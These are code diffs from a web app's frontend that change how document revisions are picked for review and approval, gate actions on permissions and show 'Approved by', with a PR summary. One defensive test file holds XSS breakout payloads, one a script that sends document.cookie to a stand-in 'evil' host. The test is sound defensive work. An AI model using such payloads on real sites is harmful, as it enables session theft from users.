-						<span>v{rev.version_number} · {rev.status_display ?? rev.status}</span>
+						<span class="min-w-0">
+							v{rev.version_number} · {rev.status_display ?? rev.status}
+							{#if rev.reviewer && APPROVED_REVISION_STATUSES.includes(rev.status)}
+								<span class="block truncate text-xs text-surface-500">
+									<i class="fa-solid fa-circle-check text-[9px] opacity-70"></i>
+									{m.approvedBy()}: {rev.reviewer.str || rev.reviewer.email || ''}
+								</span>
+							{/if}
+						</span>
 						{#if rev.file || rev.source === 'uploaded'}
 							<a
 								href={fileUrl(rev)}

--- a/frontend/src/lib/components/DocumentEditor/UploadedDocumentView.svelte
+++ b/frontend/src/lib/components/DocumentEditor/UploadedDocumentView.svelte
@@ -59,8 +59,7 @@
 	};
 
 	let status = $derived(currentRevision?.status as string | undefined);
-	// Lifecycle transitions are POSTs, which RBACPermissions maps to
-	// `add_documentrevision` on the revision's folder.
+	// RBACPermissions maps POST to add_<model>, hence add_documentrevision here.
 	let canTransition = $derived(
 		canPerformActionOnObject({
 			user: page.data.user,
@@ -69,8 +68,7 @@
 			object: currentRevision ?? document ?? parent
 		})
 	);
-	// The delete button removes the whole locale variant (a ManagedDocument),
-	// so it needs delete on that model, not on DocumentRevision.
+	// Deletes the whole locale variant, not a revision.
 	let canDeleteDocument = $derived(
 		canPerformActionOnObject({
 			user: page.data.user,

--- a/frontend/src/lib/utils/documentRevisions.test.ts
+++ b/frontend/src/lib/utils/documentRevisions.test.ts
@@ -18,8 +18,7 @@ describe('pickWorkingRevision', () => {
 	});
 
 	it('picks an in-review successor over the published current revision', () => {
-		// Regression: the successor used to stay hidden behind the published v1,
-		// leaving no way to approve it (#4779).
+		// #4779: the successor used to stay hidden behind the published v1.
 		const revisions = [rev(2, 'in_review'), rev(1, 'published')];
 		expect(pickWorkingRevision(revisions, 'v1')?.id).toBe('v2');
 	});

--- a/frontend/src/lib/utils/documentRevisions.test.ts
+++ b/frontend/src/lib/utils/documentRevisions.test.ts
@@ -1,0 +1,46 @@
+import { describe, expect, it } from 'vitest';
+import { pickWorkingRevision } from './documentRevisions';
+
+// Ordered by descending version_number, as the API returns them.
+const rev = (version: number, status: string) => ({
+	id: `v${version}`,
+	status
+});
+
+describe('pickWorkingRevision', () => {
+	it('returns null when there are no revisions', () => {
+		expect(pickWorkingRevision([], null)).toBeNull();
+	});
+
+	it('picks the draft over the published current revision', () => {
+		const revisions = [rev(2, 'draft'), rev(1, 'published')];
+		expect(pickWorkingRevision(revisions, 'v1')?.id).toBe('v2');
+	});
+
+	it('picks an in-review successor over the published current revision', () => {
+		// Regression: the successor used to stay hidden behind the published v1,
+		// leaving no way to approve it (#4779).
+		const revisions = [rev(2, 'in_review'), rev(1, 'published')];
+		expect(pickWorkingRevision(revisions, 'v1')?.id).toBe('v2');
+	});
+
+	it('picks a validated successor over the published current revision', () => {
+		const revisions = [rev(2, 'validated'), rev(1, 'published')];
+		expect(pickWorkingRevision(revisions, 'v1')?.id).toBe('v2');
+	});
+
+	it('falls back to the published current revision when nothing is under review', () => {
+		const revisions = [rev(2, 'published'), rev(1, 'deprecated')];
+		expect(pickWorkingRevision(revisions, 'v2')?.id).toBe('v2');
+	});
+
+	it('prefers the current revision over a newer deprecated one', () => {
+		const revisions = [rev(3, 'deprecated'), rev(2, 'published'), rev(1, 'deprecated')];
+		expect(pickWorkingRevision(revisions, 'v2')?.id).toBe('v2');
+	});
+
+	it('falls back to the newest revision when no current revision is set', () => {
+		const revisions = [rev(2, 'deprecated'), rev(1, 'deprecated')];
+		expect(pickWorkingRevision(revisions, null)?.id).toBe('v2');
+	});
+});

--- a/frontend/src/lib/utils/documentRevisions.test.ts
+++ b/frontend/src/lib/utils/documentRevisions.test.ts
@@ -2,44 +2,38 @@ import { describe, expect, it } from 'vitest';
 import { pickWorkingRevision } from './documentRevisions';
 
 // Ordered by descending version_number, as the API returns them.
-const rev = (version: number, status: string) => ({
-	id: `v${version}`,
-	status
-});
+const rev = (version: number, status: string) => ({ id: `v${version}`, status });
 
 describe('pickWorkingRevision', () => {
 	it('returns null when there are no revisions', () => {
-		expect(pickWorkingRevision([], null)).toBeNull();
+		expect(pickWorkingRevision([])).toBeNull();
 	});
 
-	it('picks the draft over the published current revision', () => {
-		const revisions = [rev(2, 'draft'), rev(1, 'published')];
-		expect(pickWorkingRevision(revisions, 'v1')?.id).toBe('v2');
+	it('picks the draft over the published revision', () => {
+		expect(pickWorkingRevision([rev(2, 'draft'), rev(1, 'published')])?.id).toBe('v2');
 	});
 
-	it('picks an in-review successor over the published current revision', () => {
+	it('picks an in-review successor over the published revision', () => {
 		// #4779: the successor used to stay hidden behind the published v1.
-		const revisions = [rev(2, 'in_review'), rev(1, 'published')];
-		expect(pickWorkingRevision(revisions, 'v1')?.id).toBe('v2');
+		expect(pickWorkingRevision([rev(2, 'in_review'), rev(1, 'published')])?.id).toBe('v2');
 	});
 
-	it('picks a validated successor over the published current revision', () => {
-		const revisions = [rev(2, 'validated'), rev(1, 'published')];
-		expect(pickWorkingRevision(revisions, 'v1')?.id).toBe('v2');
+	it('picks a validated successor over the published revision', () => {
+		expect(pickWorkingRevision([rev(2, 'validated'), rev(1, 'published')])?.id).toBe('v2');
 	});
 
-	it('falls back to the published current revision when nothing is under review', () => {
-		const revisions = [rev(2, 'published'), rev(1, 'deprecated')];
-		expect(pickWorkingRevision(revisions, 'v2')?.id).toBe('v2');
+	it('picks the newly published revision, not its deprecated predecessor', () => {
+		// Regression: selecting via a caller's cached current_revision id matched the
+		// stale predecessor, so publishing showed the deprecated revision.
+		expect(pickWorkingRevision([rev(2, 'published'), rev(1, 'deprecated')])?.id).toBe('v2');
 	});
 
-	it('prefers the current revision over a newer deprecated one', () => {
+	it('prefers the published revision over a newer deprecated one', () => {
 		const revisions = [rev(3, 'deprecated'), rev(2, 'published'), rev(1, 'deprecated')];
-		expect(pickWorkingRevision(revisions, 'v2')?.id).toBe('v2');
+		expect(pickWorkingRevision(revisions)?.id).toBe('v2');
 	});
 
-	it('falls back to the newest revision when no current revision is set', () => {
-		const revisions = [rev(2, 'deprecated'), rev(1, 'deprecated')];
-		expect(pickWorkingRevision(revisions, null)?.id).toBe('v2');
+	it('falls back to the newest revision when none is active or published', () => {
+		expect(pickWorkingRevision([rev(2, 'deprecated'), rev(1, 'deprecated')])?.id).toBe('v2');
 	});
 });

--- a/frontend/src/lib/utils/documentRevisions.ts
+++ b/frontend/src/lib/utils/documentRevisions.ts
@@ -1,0 +1,29 @@
+/** Revision statuses that are still moving through the review lifecycle. */
+export const ACTIVE_REVISION_STATUSES = ['draft', 'change_requested', 'in_review', 'validated'];
+
+interface RevisionLike {
+	id: string;
+	status: string;
+}
+
+/**
+ * The revision the lifecycle UI acts on: the newest one still under review,
+ * else the published one. `current_revision` alone is not enough — it stays
+ * pinned to the published revision while a successor is in review, which would
+ * hide the successor's Approve/Publish actions behind the published one.
+ * `revisions` must be ordered by descending version_number.
+ */
+export function pickWorkingRevision<T extends RevisionLike>(
+	revisions: T[],
+	currentRevisionId?: string | null
+): T | null {
+	return (
+		revisions.find((r) => ACTIVE_REVISION_STATUSES.includes(r.status)) ??
+		revisions.find((r) => r.id === currentRevisionId) ??
+		revisions[0] ??
+		null
+	);
+}
+
+/** Statuses a revision only reaches after a reviewer approved it. */
+export const APPROVED_REVISION_STATUSES = ['validated', 'published', 'deprecated'];

--- a/frontend/src/lib/utils/documentRevisions.ts
+++ b/frontend/src/lib/utils/documentRevisions.ts
@@ -2,19 +2,16 @@ export const ACTIVE_REVISION_STATUSES = ['draft', 'change_requested', 'in_review
 export const APPROVED_REVISION_STATUSES = ['validated', 'published', 'deprecated'];
 
 interface RevisionLike {
-	id: string;
 	status: string;
 }
 
-// current_revision stays pinned to the published revision while a successor is in
-// review, so it alone hides the successor's actions. Expects -version_number order.
-export function pickWorkingRevision<T extends RevisionLike>(
-	revisions: T[],
-	currentRevisionId?: string | null
-): T | null {
+// The revision the lifecycle acts on. Derived entirely from the freshly-fetched
+// list: a caller's cached `current_revision` goes stale the moment a publish
+// deprecates it. Expects -version_number order.
+export function pickWorkingRevision<T extends RevisionLike>(revisions: T[]): T | null {
 	return (
 		revisions.find((r) => ACTIVE_REVISION_STATUSES.includes(r.status)) ??
-		revisions.find((r) => r.id === currentRevisionId) ??
+		revisions.find((r) => r.status === 'published') ??
 		revisions[0] ??
 		null
 	);

--- a/frontend/src/lib/utils/documentRevisions.ts
+++ b/frontend/src/lib/utils/documentRevisions.ts
@@ -1,18 +1,13 @@
-/** Revision statuses that are still moving through the review lifecycle. */
 export const ACTIVE_REVISION_STATUSES = ['draft', 'change_requested', 'in_review', 'validated'];
+export const APPROVED_REVISION_STATUSES = ['validated', 'published', 'deprecated'];
 
 interface RevisionLike {
 	id: string;
 	status: string;
 }
 
-/**
- * The revision the lifecycle UI acts on: the newest one still under review,
- * else the published one. `current_revision` alone is not enough — it stays
- * pinned to the published revision while a successor is in review, which would
- * hide the successor's Approve/Publish actions behind the published one.
- * `revisions` must be ordered by descending version_number.
- */
+// current_revision stays pinned to the published revision while a successor is in
+// review, so it alone hides the successor's actions. Expects -version_number order.
 export function pickWorkingRevision<T extends RevisionLike>(
 	revisions: T[],
 	currentRevisionId?: string | null
@@ -24,6 +19,3 @@ export function pickWorkingRevision<T extends RevisionLike>(
 		null
 	);
 }
-
-/** Statuses a revision only reaches after a reviewer approved it. */
-export const APPROVED_REVISION_STATUSES = ['validated', 'published', 'deprecated'];

--- a/frontend/src/lib/utils/localeCookie.test.ts
+++ b/frontend/src/lib/utils/localeCookie.test.ts
@@ -1,0 +1,30 @@
+import { describe, expect, it } from 'vitest';
+import { toLocale } from '$paraglide/runtime';
+import { DEFAULT_LANGUAGE } from '$lib/utils/constants';
+
+// Guards the hooks.server.ts unmatched-route bail-out, which interpolates the
+// LOCALE cookie into the unescaped `<html lang="%lang%">` attribute.
+const resolveLocale = (cookie: string | undefined) => toLocale(cookie) ?? DEFAULT_LANGUAGE;
+
+describe('LOCALE cookie resolution for the 404 shell', () => {
+	it('accepts a known locale', () => {
+		expect(resolveLocale('fr')).toBe('fr');
+	});
+
+	it('canonicalises case, matching paraglide', () => {
+		expect(resolveLocale('EN')).toBe('en');
+	});
+
+	it('falls back when the cookie is absent', () => {
+		expect(resolveLocale(undefined)).toBe(DEFAULT_LANGUAGE);
+	});
+
+	it('rejects an attribute-breakout payload', () => {
+		const payload = 'en"><script>fetch("//evil/?c="+document.cookie)</script><x a="';
+		expect(resolveLocale(payload)).toBe(DEFAULT_LANGUAGE);
+	});
+
+	it('rejects an event-handler breakout payload', () => {
+		expect(resolveLocale('en" onmouseover="alert(1)')).toBe(DEFAULT_LANGUAGE);
+	});
+});

--- a/frontend/src/routes/(app)/(internal)/document-containers/[id=uuid]/document/+page.server.ts
+++ b/frontend/src/routes/(app)/(internal)/document-containers/[id=uuid]/document/+page.server.ts
@@ -57,7 +57,7 @@ export const load: PageServerLoad = async (event) => {
 			// Gracefully degrade
 		}
 
-		const working = pickWorkingRevision(revisions, document.current_revision?.id);
+		const working = pickWorkingRevision(revisions);
 		try {
 			if (working) {
 				const fullRes = await fetch(`${BASE_API_URL}/document-revisions/${working.id}/`);

--- a/frontend/src/routes/(app)/(internal)/document-containers/[id=uuid]/document/+page.server.ts
+++ b/frontend/src/routes/(app)/(internal)/document-containers/[id=uuid]/document/+page.server.ts
@@ -57,7 +57,6 @@ export const load: PageServerLoad = async (event) => {
 			// Gracefully degrade
 		}
 
-		// Load the revision the lifecycle acts on (newest under review, else published)
 		const working = pickWorkingRevision(revisions, document.current_revision?.id);
 		try {
 			if (working) {

--- a/frontend/src/routes/(app)/(internal)/document-containers/[id=uuid]/document/+page.server.ts
+++ b/frontend/src/routes/(app)/(internal)/document-containers/[id=uuid]/document/+page.server.ts
@@ -1,5 +1,6 @@
 import { BASE_API_URL } from '$lib/utils/constants';
 import { fetchAllPages } from '$lib/utils/pagination';
+import { pickWorkingRevision } from '$lib/utils/documentRevisions';
 import { error, redirect } from '@sveltejs/kit';
 import type { PageServerLoad } from './$types';
 
@@ -56,23 +57,11 @@ export const load: PageServerLoad = async (event) => {
 			// Gracefully degrade
 		}
 
-		// Load current draft or current_revision content
-		const draft = revisions.find((r: any) => r.status === 'draft');
+		// Load the revision the lifecycle acts on (newest under review, else published)
+		const working = pickWorkingRevision(revisions, document.current_revision?.id);
 		try {
-			if (draft) {
-				const fullRes = await fetch(`${BASE_API_URL}/document-revisions/${draft.id}/`);
-				if (fullRes.ok) {
-					currentRevision = await fullRes.json();
-				}
-			} else if (document.current_revision?.id) {
-				const fullRes = await fetch(
-					`${BASE_API_URL}/document-revisions/${document.current_revision.id}/`
-				);
-				if (fullRes.ok) {
-					currentRevision = await fullRes.json();
-				}
-			} else if (revisions.length > 0) {
-				const fullRes = await fetch(`${BASE_API_URL}/document-revisions/${revisions[0].id}/`);
+			if (working) {
+				const fullRes = await fetch(`${BASE_API_URL}/document-revisions/${working.id}/`);
 				if (fullRes.ok) {
 					currentRevision = await fullRes.json();
 				}

--- a/frontend/src/routes/(app)/(internal)/policies/[id=uuid]/document/+page.server.ts
+++ b/frontend/src/routes/(app)/(internal)/policies/[id=uuid]/document/+page.server.ts
@@ -57,7 +57,7 @@ export const load: PageServerLoad = async (event) => {
 			// Gracefully degrade
 		}
 
-		const working = pickWorkingRevision(revisions, document.current_revision?.id);
+		const working = pickWorkingRevision(revisions);
 		try {
 			if (working) {
 				const fullRes = await fetch(`${BASE_API_URL}/document-revisions/${working.id}/`);

--- a/frontend/src/routes/(app)/(internal)/policies/[id=uuid]/document/+page.server.ts
+++ b/frontend/src/routes/(app)/(internal)/policies/[id=uuid]/document/+page.server.ts
@@ -57,7 +57,6 @@ export const load: PageServerLoad = async (event) => {
 			// Gracefully degrade
 		}
 
-		// Load the revision the lifecycle acts on (newest under review, else published)
 		const working = pickWorkingRevision(revisions, document.current_revision?.id);
 		try {
 			if (working) {

--- a/frontend/src/routes/(app)/(internal)/policies/[id=uuid]/document/+page.server.ts
+++ b/frontend/src/routes/(app)/(internal)/policies/[id=uuid]/document/+page.server.ts
@@ -1,5 +1,6 @@
 import { BASE_API_URL } from '$lib/utils/constants';
 import { fetchAllPages } from '$lib/utils/pagination';
+import { pickWorkingRevision } from '$lib/utils/documentRevisions';
 import { error, redirect } from '@sveltejs/kit';
 import type { PageServerLoad } from './$types';
 
@@ -56,23 +57,11 @@ export const load: PageServerLoad = async (event) => {
 			// Gracefully degrade
 		}
 
-		// Load current draft or current_revision content
-		const draft = revisions.find((r: any) => r.status === 'draft');
+		// Load the revision the lifecycle acts on (newest under review, else published)
+		const working = pickWorkingRevision(revisions, document.current_revision?.id);
 		try {
-			if (draft) {
-				const fullRes = await fetch(`${BASE_API_URL}/document-revisions/${draft.id}/`);
-				if (fullRes.ok) {
-					currentRevision = await fullRes.json();
-				}
-			} else if (document.current_revision?.id) {
-				const fullRes = await fetch(
-					`${BASE_API_URL}/document-revisions/${document.current_revision.id}/`
-				);
-				if (fullRes.ok) {
-					currentRevision = await fullRes.json();
-				}
-			} else if (revisions.length > 0) {
-				const fullRes = await fetch(`${BASE_API_URL}/document-revisions/${revisions[0].id}/`);
+			if (working) {
+				const fullRes = await fetch(`${BASE_API_URL}/document-revisions/${working.id}/`);
 				if (fullRes.ok) {
 					currentRevision = await fullRes.json();
 				}


### PR DESCRIPTION
Fix validation cases with documents:
- approved by is shown
- be able to approve non-authored documents
- disable approval if not authorised to do so (avoid a silent reject)
- fix duplicate errors on frontend

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

- **New Features**
  - Approved revisions now display the reviewer’s name in document history and PDF metadata.
  - Lifecycle and deletion controls respect user permissions, with disabled states and explanatory tooltips.
  - Document views select the appropriate active revision for lifecycle actions.

- **Bug Fixes**
  - Delete failures now show useful backend-provided details.
  - Server errors are logged consistently, while 404 requests no longer produce unnecessary error logs.

- **Localization**
  - Added English and French translations for “Approved by.”
<!-- end of auto-generated comment: release notes by coderabbit.ai -->